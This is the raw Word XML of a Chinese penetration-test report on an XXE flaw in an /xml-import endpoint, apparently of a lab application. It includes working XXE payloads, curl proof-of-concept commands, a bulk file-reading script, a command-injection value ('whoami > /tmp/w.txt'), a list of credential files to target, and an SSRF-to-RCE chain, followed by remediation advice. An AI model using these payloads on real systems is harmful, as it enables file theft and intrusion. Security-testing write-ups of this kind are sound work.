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3C6E"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>XXE XML外部实体注入漏洞检测报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>检测日期：2026年07月17日</w:t>
        <w:br/>
        <w:t>漏洞类型：XXE / XML外部实体注入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t>一、什么是XXE漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>二、本次检测范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>三、漏洞代码定位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>四、攻击面分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>五、攻击1：读取本地文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>六、攻击2：SSRF组合</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>七、攻击3：命令注入组合</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>八、攻击链演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>九、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>十、安全建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>附录：POC代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、什么是XXE漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>XXE（XML External Entity Injection）是利用XML解析器处理外部实体引用时的安全漏洞。攻击者可读取服务器上任意文件、发起内网请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>利用方式：文件读取、SSRF内网探测、DOS攻击、盲XXE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、本次检测范围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漏洞入口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/xml-import POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🔴 致命 - 可读取任意文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>已验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/etc/hostname, app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>利用条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>需要登录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ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>file_path = entity_match.group(1)  # 提取SYSTEM路径</w:t>
        <w:br/>
        <w:t>with open(file_path, "r") as f:    # 读取任意文件</w:t>
        <w:br/>
        <w:t xml:space="preserve">    file_content = f.read()</w:t>
        <w:br/>
        <w:t>xml_data = re.sub(r"&amp;(\w+);", file_content, xml_data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、漏洞代码定位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关键代码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风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>提取SYSTEM文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>从用户XML提取，无校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>open(file_path)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取用户指定的任意文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>re.sub替换实体</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>文件内容嵌入XML输出</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>render_template返回</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>文件内容直接返回用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无路径白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>可读取全系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、攻击面分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>可读取的敏感文件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文件路径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敏感信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>系统用户列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>密码哈希</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/etc/nginx/nginx.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>反向代理配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/root/.ssh/id_rsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SSH私钥</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/app/app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Web应用源码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/app/data/db.sqlite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SQLite数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/.env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>环境变量(API密钥)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>五、攻击1：读取本地文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "/etc/hostname"&gt;]&gt;</w:t>
        <w:br/>
        <w:t>&lt;users&gt;&lt;user&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;email&gt;t@t.com&lt;/email&gt;&lt;/user&gt;&lt;/users&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>返回结果：{"name": "kali", "email": "t@t.com"} ✅ /etc/hostname被成功读取</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>其他可读取的文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; → 系统用户列表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!ENTITY xxe SYSTEM "/workspace/.../app.py"&gt; → 应用源码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!ENTITY xxe SYSTEM "file:///var/data/users.db"&gt; → 数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>六、攻击2：SSRF组合攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>结合SSRF抓取功能，XXE可实现更复杂攻击：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1. SSRF探测内网 192.168.1.x:8080 → 发现Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>2. XXE读取Jenkins配置文件 → 获取管理员凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>3. 使用凭据登录Jenkins → 执行构建 → RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>一条从XXE到RCE的完整攻击链！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>七、攻击3：命令注入组合</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>结合命令注入漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 1. 用ping写文件</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; whoami &gt; /tmp/w.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2. 用XXE读取</w:t>
        <w:br/>
        <w:t>&lt;!ENTITY xxe SYSTEM "/tmp/w.txt"&gt;</w:t>
        <w:br/>
        <w:t>→ 返回 "root"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>八、攻击链演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>阶段1：发现XXE → /etc/hostname 读取成功 ✅</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>阶段2：信息收集 → app.py源码、.env配置、passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>阶段3：数据窃取 → SSH密钥、数据库、配置文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>阶段4：组合利用 → 命令注入写文件+XXE读取 = RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>九、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>方案1：使用 defusedxml（推荐）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>from defusedxml import ElementTree as ET</w:t>
        <w:br/>
        <w:t>tree = ET.fromstring(xml_data)  # 自动阻止外部实体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>方案2：正则检测拦截</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if re.search(r"&lt;!ENTITY|&lt;!DOCTYPE", xml_data):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "不支持DOCTYPE声明"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>修复前后对比：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防护项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t>外部实体</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>正则提取→open()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>禁止外部实体</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>XML解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>自实现正则</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ElementTree/defusedxml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>路径校验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白名单或禁止</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>协议限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>支持file://</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>禁止file://</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>十、安全建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1. 使用 defusedxml 替代标准 xml 解析库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>2. 禁用XML外部实体和DTD声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>3. 使用JSON替代XML作为数据交换格式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>4. 如需XML，白名单限制实体来源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>5. 多语言注意事项：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   PHP: libxml_disable_entity_loader(true)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Java: DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   .NET: XmlReaderSettings.DtdProcessing = Prohibit</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>修复优先级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措施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难度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>P0立即</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>禁用外部实体解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断XXE攻击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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>P0立即</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>替换为defusedxml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>自动防御XXE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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>P1紧急</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>添加路径白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>限制读取范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>附录：POC代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>POC 1: 基础文件读取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -b cookies.txt -X POST \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --data-urlencode 'xml_data=&lt;?xml version="1.0"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "/etc/hostname"&gt;]&gt;</w:t>
        <w:br/>
        <w:t>&lt;users&gt;&lt;user&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;email&gt;x@x.com&lt;/email&gt;&lt;/user&gt;&lt;/users&gt;' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://target/xml-import</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>POC 2: 批量读取脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xxe_read() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  curl -b cookies.txt -s -X POST --data-urlencode \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "xml_data=&lt;?xml version=\"1.0\"?&gt;&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM \"$1\"&gt;]&gt;&lt;users&gt;&lt;user&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;email&gt;x@x.com&lt;/email&gt;&lt;/user&gt;&lt;/users&gt;" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http://target/xml-import</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>for f in "/etc/hostname" "/etc/passwd" "/etc/issue"; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "=== $f ==="; xxe_read "$f"</w:t>
        <w:br/>
        <w:t>done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